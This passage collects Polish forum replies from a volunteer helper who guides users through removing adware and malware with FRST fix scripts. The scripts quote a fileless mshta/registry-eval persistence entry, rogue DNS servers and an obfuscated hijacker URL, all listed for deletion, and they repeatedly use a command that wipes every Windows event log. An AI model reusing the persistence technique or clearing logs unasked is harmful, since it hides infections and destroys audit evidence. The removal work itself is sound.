Miszel03

Tak, przygotowałem skrypt (gdyż przy okazji znowu wyczyszczę Dziennik Zdarzeń, żeby nie widniał tam ten nieaktualny błąd). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: S2 U3sHlpDr; C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys [7423 2018-02-10] () [brak podpisu cyfrowego] C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys S0 MBAMSwissArmy; System32\Drivers\mbamswissarmy.sys [X] Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Co oznacza sformułowanie "nic to nie dało"? Czy zostały wykryte jakieś zagrożenia? Jeśli tak to proszę dostarczyć z tego raport. Brakuje raportu Shortcut, więc będę go wymagał w następnym poście. Wydaję mi się, że poniższe elementy to infekcja: Startup: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk [2018-02-13] ShortcutTarget: JDSound.lnk -> C:\Users\Adam\AppData\Roaming\appmr\JDSound.vbs () 2018-02-13 15:06 - 2018-02-13 16:01 - 000000000 ____D C:\Users\Adam\AppData\Roaming\vbhost 2018-02-13 15:06 - 2018-02-13 15:06 - 000000000 ____D C:\Users\Adam\AppData\Roaming\appmr ...gdyż: - data utworzenia jest wczorajsza, - nie mogę powiązać tych komponentów z żadnym poprawnym, zainstalowanym oprogramowaniem, - nazwy folderów wyglądają podejrzanie. Czy może znasz te wpisy? W skrypcie odbędzie się ich kasacja, a oprócz tego sprzątanie szczątek po wcześniej odinstalowanym oprogramowaniu (m.in po Mozilla FireFox), a także kasacja martwych wpisów itd. Akcja: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-3636725091-2947975232-529749042-1002_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Adam\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\amd64\FileCoAuthLib64.dll => Brak pliku Task: {0B420E43-ABE8-4D21-B427-69F70240C3AA} - \Microsoft\Windows\Setup\EOSNotify -> Brak pliku Task: {D5EDEC38-D37C-4B04-9401-DE378129ACC1} - System32\Tasks\CreateChoiceProcessTask => C:\Windows\BrowserChoice\browserchoice.exe Startup: C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk [2018-02-13] ShortcutTarget: JDSound.lnk -> C:\Users\Adam\AppData\Roaming\appmr\JDSound.vbs () C:\Users\Adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JDSound.lnk HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3636725091-2947975232-529749042-1002 -> {C0C3A6C6-03BC-4195-8FCB-AEA091301353} URL = hxxps://pl.search.yahoo.com/yhs/search?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__ch_WCYID10181_1355_171108__yaie&p={searchTerms} S3 intaud_WaveExtensible; \SystemRoot\system32\drivers\intelaud.sys [X] S3 iwdbus; \SystemRoot\System32\drivers\iwdbus.sys [X] 2018-02-13 15:06 - 2018-02-13 16:01 - 000000000 ____D C:\Users\Adam\AppData\Roaming\vbhost 2018-02-13 15:06 - 2018-02-13 15:06 - 000000000 ____D C:\Users\Adam\AppData\Roaming\appmr DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Adam\AppData\Local\Mozilla C:\Users\Adam\AppData\Roaming\Mozilla C:\Users\Adam\AppData\Roaming\Profiles Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przeskanuj system za pomocą HitmanPro. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i koniecznie Shortcut. Dołącz też plik fixlog.txt.

Nie wykluczony konflikt obu programów. Czy ja prosiłem o użycie skanera Kasperskiego?! Proszę wykonywać moje instrukcję. Teraz widzę, że Malwarebytes odizolował wszystko z ostatniego skanu w kwarantannie (możesz ją opróżnić i odinstalować program). Wcześniejsze zagrożenia nie zostały odizolowane, w momencie, w którym dostałem raport, stąd moje polecenie by te zagrożenia usunąć. Proszę teraz o komplet raportów FRST w celu oceny sytuacji.

Bardzo mi miło, że mogłem pomóc. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

1. Zagrożenia wykryte przez Malwarebytes daj do kasacji. 2. Przez SHIFT + DELETE skasuj poniższe foldery szczątkowe po przeterminowanym SpyBot: C:\ProgramData\Spybot - Search & Destroy C:\Program Files (x86)Spybot - Search & Destroy 2 3. Napisz jak podsumowujesz obecną sytuację, czy problem, z którym się do nas zgłosiłeś ustąpił?

Niezły bałagan, m.in infekcja DNS z poziomu systemu (ustawione adresy są zagraniczne, często widziane tu jako infekcyjne - KLIK / KLIK), zarażone przez adware przeglądarki (w tym wspominany przez Ciebie uciążliwy Safefinder), infekcja Albireo. P.S: Widzę tutaj również crack KMS, który kojarzony jest z lewym aktywatorem pakietu Office - nie ruszam go, zdejmuję tylko jego blokady typu Debbuger. Pod ocenę indywidualną zostawiam co z nim zrobisz (choć nie wiadomo co w nim jest). I przy okazji: resetuje również plik Hosts (są tam modyfikacje chyba też aktywatora licencji, ale nie jestem pewien - jeśli nie życzysz sobie tego to usuń ze skryptu linijkę Hosts:) Portale z oprogramowaniem / Instalatory - na co uważać Dezynfekcja: 1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\Users\pklos\Documents\INTERsoft\ArCADia-START\6.5 PL\Print Styles\Create a Print Style Table.lnk C:\Users\pklos\Desktop\Auslogics DiskDefrag.lnk Task: {27D13405-9702-4343-A295-DC4497BCFA05} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku HKLM\...\Run: [sERVICE] => [X] HKLM\...\RunOnce: [x4zzmy5u5ag] => C:\Program Files (x86)\ccc\ccc.exe [670208 2018-02-11] () HKLM\...\RunOnce: [pqgyl4fam1f] => C:\Program Files (x86)\ccc\ccc.exe [670208 2018-02-11] () C:\Program Files (x86)\ccc HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\...\Policies\Explorer: [] AppInit_DLLs: C:\ProgramData\Quoteex\Dripranfix.dll => Brak pliku AppInit_DLLs-x32: C:\ProgramData\Quoteex\Driptech.dll => Brak pliku C:\ProgramData\Quoteex IFEO\OSppSvc.exe: [Debugger] KMS-R@1nHook.exe IFEO\SppExtComObj.exe: [Debugger] KMS-R@1nHook.exe BootExecute: autocheck autochk * sdnclean64.exe GroupPolicy: Ograniczenia - Chrome HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia HKU\S-1-5-21-1307399746-3321642949-2734818087-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYrAlKCo1kNn6F9vcF55hOQj6P9k6WrOGoLccoB77SOD-E_nl2Ja0e9z4E-Qq7umdnTrL2pKx7ADSs5fDKilpQ7nI8Q25B1bt_NZg30rpdle0ZkmtmGbGvA5MPWKWXvnZmv6g887a8EvGLsc9RoH_gzqAijFw,,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope - brak wartości FF NewTab: Mozilla\Firefox\Profiles\34v2zedf.default -> C:\\ProgramData\\Quoteexs\\ff.NT CHR StartupUrls: Default -> "hxxps://search.safefinder.com/?st=sc&q=" S1 elauxnoe; \??\C:\WINDOWS\system32\drivers\elauxnoe.sys [X] S1 fndzutse; \??\C:\WINDOWS\system32\drivers\fndzutse.sys [X] 2018-02-11 22:55 - 2018-02-11 22:55 - 007576064 _____ () C:\Users\pklos\AppData\Local\agent.dat 2018-02-11 22:55 - 2018-02-11 22:55 - 000070896 _____ () C:\Users\pklos\AppData\Local\Config.xml 2018-02-11 22:55 - 2018-02-11 22:55 - 000140800 _____ () C:\Users\pklos\AppData\Local\installer.dat 2018-02-11 22:55 - 2018-02-11 22:55 - 000005568 _____ () C:\Users\pklos\AppData\Local\md.xml 2018-02-11 22:55 - 2018-02-11 22:55 - 000126464 _____ () C:\Users\pklos\AppData\Local\noah.dat 2018-02-11 22:55 - 2018-02-11 22:55 - 000278509 _____ () C:\Users\pklos\AppData\Local\Rankronstring.tst 2018-02-11 22:55 - 2018-02-11 22:55 - 001983026 _____ () C:\Users\pklos\AppData\Local\Subhome.tst Tcpip\..\Interfaces\{2cc371c0-e1e4-4191-ad71-68a0ab659df2}: [NameServer] 82.163.142.8,95.211.158.136 Tcpip\..\Interfaces\{6997474f-c083-4230-bc4d-cdf004e68961}: [NameServer] 82.163.142.8,95.211.158.136 CMD: ipconfig /flushdns VirusTotal: C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\pklos\AppData\Local CMD: dir /a C:\Users\pklos\AppData\LocalLow CMD: dir /a C:\Users\pklos\AppData\Roaming Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść i zabezpiecz przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google (widoczny SafeFinder został skasowany w skrypcie). 4. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Na PW zgłosiłeś, że dałeś poprawne logi i że temat jest aktualny, więc odpowiadam. W raportach widoczne nieporządne instalacje i zanieczyszczony przez adware / PUP plik Hosts. Tym się teraz będzie zajmować, a przy okazji posprzątam system z resztek po oprogramowaniu. 1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK. 2. Przez Panel Sterownia odinstaluj: wątpliwe / fałszywe oprogramowanie zabezpieczające: ByteFence Anti-Malware. adware / PUP: WarThunder (fałszywa instalacja, nie myl z oryginalną). 3. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-5B4B93E820CD}\InprocServer32 -> %%systemroot%%\system32\shell32.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{8C46158B-D978-483C-A312-16EE5013BE04}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.33.3\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2441937318-2594584175-3204281650-1000_Classes\CLSID\{CB492AF1-2CEF-4E58-BE47-471C77D0C8BA}\InprocServer32 -> C:\Users\Seba\AppData\Local\Google\Update\1.3.32.7\psuser_64.dll => Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku Task: {1B1D7347-1562-467A-9B52-400FF969E2C0} - System32\Tasks\{70C1515F-9C50-4BF6-A02F-A7169283EE48} => C:\Windows\system32\pcalua.exe -a "D:\rmst\Assassins.Creed.Revelations.v1.01.Update-SKIDROW [ALEX]\ac_revelations_1.01_eu.exe" -d "D:\rmst\Assassins.Creed.Revelations.v1.01.Update-SKIDROW [ALEX]" Task: {37E5AA98-927C-4736-A81E-6A9A683725D8} - System32\Tasks\{DA1D2933-A880-4746-AE32-900142AEC99F} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\Google\GOOGLE~1\SketchUp.exe -c "C:\Users\Seba\Dysk Google\PIAST roboczy\PIAST model6_1.skp" Task: {52EC1669-87A7-415F-9784-BC14B59E70B2} - \CCleanerSkipUAC -> Brak pliku Task: {CE621AAF-89B2-4B45-9DC9-D862C5ED5528} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku C:\Users\Seba\Desktop\WarThunder.lnk C:\Users\Seba\Desktop\Kontynuuj instalację Microsoft Word 2016.lnk Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 4. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 5. Zrób nowy log FRST (za pomocą najnowszej wersji!) z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

To zależy co masz na myśli przez "może pomóc". Z pewnością zagwarantuje czysty system operacyjny. Konto elektronicznej skrzynki pocztowej będzie raczej nie do odzyskania. Incydent możesz zgłosić na policję, co zwiększy zakres rozmowy z administratorem usługi. Raporty nie wykazują oznak infekcji. Na wszelki wypadek wykonaj jeszcze skan za pomocą HitmanPro i pokaż ewentualny wyniki. Sprawy poboczne zamykam do spoilera.

Proszę wykonywać moje zalecenia jeden do jednego. Inaczej zaczną się problemy. W przypadku Aviry tak - o to chodziło, ale w przypadku MBAM nie zostały podjęte żadne akcje (więc teraz powtórzyć skan i użyć opcji Usuń). Po tych akacjach znowu nowy zestaw raportów FRST, gdyż ten będzie nieaktualny.

Wszystko pomyślnie wykonane. Infekcja zdjęta. Zastanawia mnie tylko sterownik U3sHlpDr, gdyż: - widoczny brak podpisu cyfrowego, - data utworzenia zbiega się z czasem infekcji, - sterownik sypię błędami w Dzienniku Zdarzeń. lecz żaden z silników na VirusTotal nie wykrywa go jako zagrożenie, a po za tym oznaczony jest jako sterownik INTEL (choć nie widzę jego śladów). Skonsultuje to z picasso i dam znać. Napisz czy problemy, z którymi się do nas zgłaszałeś ustały.

Ta usługa jest w porządku. Jestem już po konsultacji z picasso. Ratunkiem może okazać się ostatnia kopia RegBack: LastRegBack: 2017-09-10 01:33 lecz niestety jest ona całkiem stara. Po przywróceniu wystąpią różne niezgodności (np. przywrócenie odinstalowanych programów w rejestrze), a nie wykluczam również gorszych efektów. Wydaję mi się, że oprócz tego przypadek kwalifikuję się również do reperacji nakładkowej. Powiedz na co się decydujesz, ale tak jak mówię: nie wiem jaki jest zakres zniszczeń, nie wiadomo również jak do końca zachowa się system po przywróceniu kopii. Najlepszą opcją jest skopiowanie najważniejszych danych na nośnik zewnętrzny i reinstalacja systemu, co da najlepszy rezultat.

Zdecydowana większość detekcji MBAM dotyczy PUP.Optional.VisualDiscovery, a to tzw. adware SuperFish ładowane domyślnie do sprzętów Lenovo. Reszta tj. mówiłem tylko drobne szczątki po adware. Detekcje Aviry zaś dotyczą praktycznie tego samego. Całość do kasacji i zrób końcowy zestaw raportów (FRST, Addition, Shortcut).

Wszystko pomyślnie wykonane. Pokaż mi jeszcze logi z Malwarebytes i Aviry ze skanowania, o które prosiłem, bym mógł przejść do ostatecznych doczyszczeń i finalizacji.

Drobna pomyłka z mojej strony, restartu nie powinno być. Usługa Windows Audio na pierwszy rzut oka wygląda w porządku (poszerzymy diagnostykę), poprosiłem już picasso, aby rzuciła okiem na temat - wiem, że kiedyś rozwiązywała już podobny przypadek, a to bez wątpienia najlepszy fachowiec. Kolejny pobór danych i akcje: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy o losowej nazwie. Wklej do pliku następującą treść: Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AudioSrv\Parameters" /s Reg: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AudioSrv\Enum" /s Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Niedziałające programy póki co sugeruję po prostu reinstalować. Tutaj jest pewnie szereg uszkodzeń, który trzeba będzie odtworzyć. Czy wyświetlają się jakieś konkretne błędy?

Nie i to jest rekomendowany sposób. Miałem go zalecić w razie niepowodzenia, ale widzę, że już mnie wyręczyłaś. CCleaner (instalacja działa?) to z pewnością autentyczne oprogramowanie, choć ostatnia afera związana z malware w instalatorze budzi pewny niepokój. Komentując zaś Advanced Registry Care Pro v2.0 to jest to raczej aplikacja o typie choinkowym, ale nie wygląda mi to na adware / PUP. Oba programy są nierekomendowane przez nas zespół, gdyż: - analiza wyników "czyścicieli" musi podlegać weryfikacji, niejednokrotnie widziane tu są efekty zbyt pośpiesznego wybrania opcji Oczyść, - metoda czyszczenia szczególnie przeglądarek podlega dyskusji, wg mnie takie operacje powinny odbywać się wykorzystując autorski mechanizm przeglądarki. Integracja innym narzędziem to proszenie się o niepotrzebne usterki / konflikty. Jeśli tam osoba nie używa tego oprogramowania to sugerowana deinstalacja. Dzisiejsza detekcja do kasacji. To instalator fałszywego skanera jakim jest YAC. Ale to raczej nie groźne, bo to zwykły instalator, którego nie wykonano. To pewnie "witaminki". Czyli drobne ślady po adware / PUP. Na koniec skanowania proszę dostarczyć wyniki wraz ze ścieżkami do plików i nic nie usuwać - wyniki trzeba zweryfikować. I przypominam o pkt. 5 na koniec wszystkich działań.

Miło mi to słyszeć. W takim razie temat zamykam.

Miło mi, że mogłem pomóc. Zamykam.

Kliknij PPM na pulpicie. Wybierz zakładkę Personalizuj po czym w lewym dolnym rogu kliknij Ekran, następnie w lewym górnym rogu wybierz "Kalibruj kolor". Postępuj zgodnie z dialogiem i dostosuj ustawienia.

Akcja pomyślnie wykonana. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows. Poniżej drobne wyjaśnienia (bo widzę, że jego oczekujesz). Ustawione proxy było następujące: ProxyServer: [s-1-5-21-3412699975-1278123406-526146009-1000] => 10.0.5.99:80 Plik Hosts został zmodyfikowany całkiem dawno i to wygląda na starą modyfikację infekcji adware / PUP (widoczne są hosty tego typu infekcji): ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2016-04-23 09:53 - 000001993 _____ C:\Windows\system32\Drivers\etc\hosts 0.0.0.0 0.0.0.0 # fix for traceroute and netstat display anomaly 0.0.0.0 tracking.opencandy.com.s3.amazonaws.com 0.0.0.0 media.opencandy.com 0.0.0.0 cdn.opencandy.com 0.0.0.0 tracking.opencandy.com 0.0.0.0 api.opencandy.com 0.0.0.0 installer.betterinstaller.com 0.0.0.0 installer.filebulldog.com 0.0.0.0 d3oxtn1x3b8d7i.cloudfront.net 0.0.0.0 inno.bisrv.com 0.0.0.0 nsis.bisrv.com 0.0.0.0 cdn.file2desktop.com 0.0.0.0 cdn.goateastcach.us 0.0.0.0 cdn.guttastatdk.us 0.0.0.0 cdn.inskinmedia.com 0.0.0.0 cdn.insta.oibundles2.com 0.0.0.0 cdn.insta.playbryte.com 0.0.0.0 cdn.llogetfastcach.us 0.0.0.0 cdn.montiera.com 0.0.0.0 cdn.msdwnld.com 0.0.0.0 cdn.mypcbackup.com 0.0.0.0 cdn.ppdownload.com 0.0.0.0 cdn.riceateastcach.us 0.0.0.0 cdn.shyapotato.us 0.0.0.0 cdn.solimba.com 0.0.0.0 cdn.tuto4pc.com 0.0.0.0 cdn.appround.biz 0.0.0.0 cdn.bigspeedpro.com 0.0.0.0 cdn.bispd.com 0.0.0.0 cdn.bisrv.com Ale jak mówię. Hosts już zresetowany do stanu domyślnego.

Jestem w stanie w to uwierzyć, bo system oprócz ostatnich wywijasów wygląda na czysty i "niezawalony". Mimo wszystko, dzisiejsze oprogramowanie antywirusowe wcale nie utrudnia korzystania z komputera i nie widzę powodu, dla którego nie miałbyś go używać. Proszę rozważyć instalację. Widoczna jest jeszcze infekcja wykonywana z klucza. Przeprowadzimy dezynfekcję, a przy okazji posprzątam resztki po programach - m.in po przeglądarce Mozilla Firefox, a także martwe wpisy / skróty. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\.DEFAULT\Software\Classes\7c7c: "C:\Windows\system32\mshta.exe" "javascript:B4aiH="jO";f4V3=new ActiveXObject("WScript.Shell");DGfa2RQ1="Wr5ul6";bOPA04=f4V3.RegRead("HKCU\\software\\wkxl\\pift");lku2oHlD="2";eval(bOPA04);eQ0yj4="2VWz";" ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S4 xhunter1; \??\C:\Windows\xhunter1.sys [X] C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\HDD Regenerator.lnk C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\Readme.lnk C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common DesktopDirectory%\HDD Regenerator.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Kamil\AppData\Local\Mozilla C:\Users\Kamil\AppData\Roaming\Mozilla C:\Users\Kamil\AppData\Roaming\Profiles VirusTotal: C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Ponów całościowy skan za pomocą Malwarebytes. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Baidu - marka związana z kontrowersjami i stosująca bardzo agresywną taktykę marketingową znacznie wykraczającą poza akceptowalny poziom. Wiele inwazyjnych produktów z tej stajni jest instalowane metodami "PUP". Multum tematów tu na forum zgłaszający "infekcje" tym produktem i niemożnością pozbycia się go. Reasumując: zmiana antywirusa była krokiem jak najbardziej pożądanym. Proszę jeszcze zauważyć, że zainstalowany na tym komputerze Maxthon Cloud Browser (ustawiony jako domyślna przeglądarka) jest związany z aferą dot. śledzenia użytkowników. Raporty nie wykazują oznak infekcji (co konkretnie wykryła Avira)? Sprzątam system z resztek po oprogramowaniu (m.in po Mozilla FireFox), kasuje martwe wpisy / skróty itd. 1. Instalacja Baidu jest uszkodzona, na początek przejdź do lokalizacji C:\Program Files (x86)\Baidu Security i z tego poziomu spróbuj uruchomić plik deinstalacyjny (nazwa zbliżona do uninstall.exe). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia SearchScopes: HKU\S-1-5-21-651531635-3565247976-1847686583-1001 -> DefaultScope {F7F3221E-776D-4531-A3C6-2A15A2EEF92D} URL = SearchScopes: HKU\S-1-5-21-651531635-3565247976-1847686583-1001 -> {F7F3221E-776D-4531-A3C6-2A15A2EEF92D} URL = S2 BAVSvc; "C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BAVSvc.exe" [X] S2 BHipsSvc; "C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BHipsSvc.exe" [X] S2 MxService; C:\Program Files (x86)\Maxthon\Bin\MxService.exe [X] U0 aswVmm; Brak ImagePath S3 BdApiUtil; \??\C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BdApiUtil64.sys [X] S3 BdCameraProtect; \??\C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BdCameraProtect64.sys [X] ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [baiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku ContextMenuHandlers1: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku ContextMenuHandlers2: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku ContextMenuHandlers6: [baidu_Scan] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CB} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\BavShx64.dll -> Brak pliku Task: {3FF52764-72BA-4E9A-AC46-FDBF2AED9F00} - \Lenovo\Experience 